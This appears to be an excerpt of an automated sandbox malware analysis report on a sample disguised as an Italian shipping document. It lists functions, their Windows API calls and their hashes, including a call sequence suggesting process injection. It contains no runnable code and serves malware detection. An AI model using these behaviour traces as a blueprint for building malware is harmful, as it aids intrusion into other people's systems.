                        • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                        • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                        • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                        • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                        Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                        • _strcat.LIBCMT ref: 0040F786
                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                        • String ID:
                        • API String ID: 3199840319-0
                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                        Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FreeInfoLibraryParametersSystem
                        • String ID:
                        • API String ID: 3403648963-0
                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                        Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                        • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                        • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                        • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                        Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        • __lock_file.LIBCMT ref: 00414A8D
                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                        • __fclose_nolock.LIBCMT ref: 00414A98
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                        Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                        Download Yara Rule
                        APIs
                        • __lock_file.LIBCMT ref: 00415012
                        • __ftell_nolock.LIBCMT ref: 0041501F
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2999321469-0
                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                        Function 041702AD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 04170A6B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04170B01
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04170B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                        • Instruction ID: 9d5ebe90affeae0fd3fbc80daca2e3edc9811eddee1b5c67a16f108427dfd948
                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                        • Instruction Fuzzy Hash: B112CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A5F81CF5A
                        Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                        • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                        Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                        • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                        • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                        • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                        Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                        Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                        Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                        • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                        • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                        • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                        Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __lock_file
                        • String ID:
                        • API String ID: 3031932315-0
                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                        Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        APIs
                        • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                        • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                        • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                        • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                        Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                        Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                        • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                        • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                        • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                        Function 041712B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 041712C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 2d72e53ed65880bf41edae4aa2cb99966cdf624ce83127b86f643c80f62c9e1a
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 2CE0E67494010DEFDB00EFB4D5496DE7FB4EF04301F500565FD01D2280D7309D608A62

                        Non-executed Functions

                        Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                        • GetKeyState.USER32(00000011), ref: 0047C92D
                        • GetKeyState.USER32(00000009), ref: 0047C936
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                        • GetKeyState.USER32(00000010), ref: 0047C953
                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                        • _wcsncpy.LIBCMT ref: 0047CA29
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                        • SendMessageW.USER32 ref: 0047CA7F
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                        • ImageList_SetDragCursorImage.COMCTL32(00AA31D0,00000000,00000000,00000000), ref: 0047CB9B
                        • ImageList_BeginDrag.COMCTL32(00AA31D0,00000000,000000F8,000000F0), ref: 0047CBAC
                        • SetCapture.USER32(?), ref: 0047CBB6
                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                        • ReleaseCapture.USER32 ref: 0047CC3A
                        • GetCursorPos.USER32(?), ref: 0047CC72
                        • ScreenToClient.USER32(?,?), ref: 0047CC80
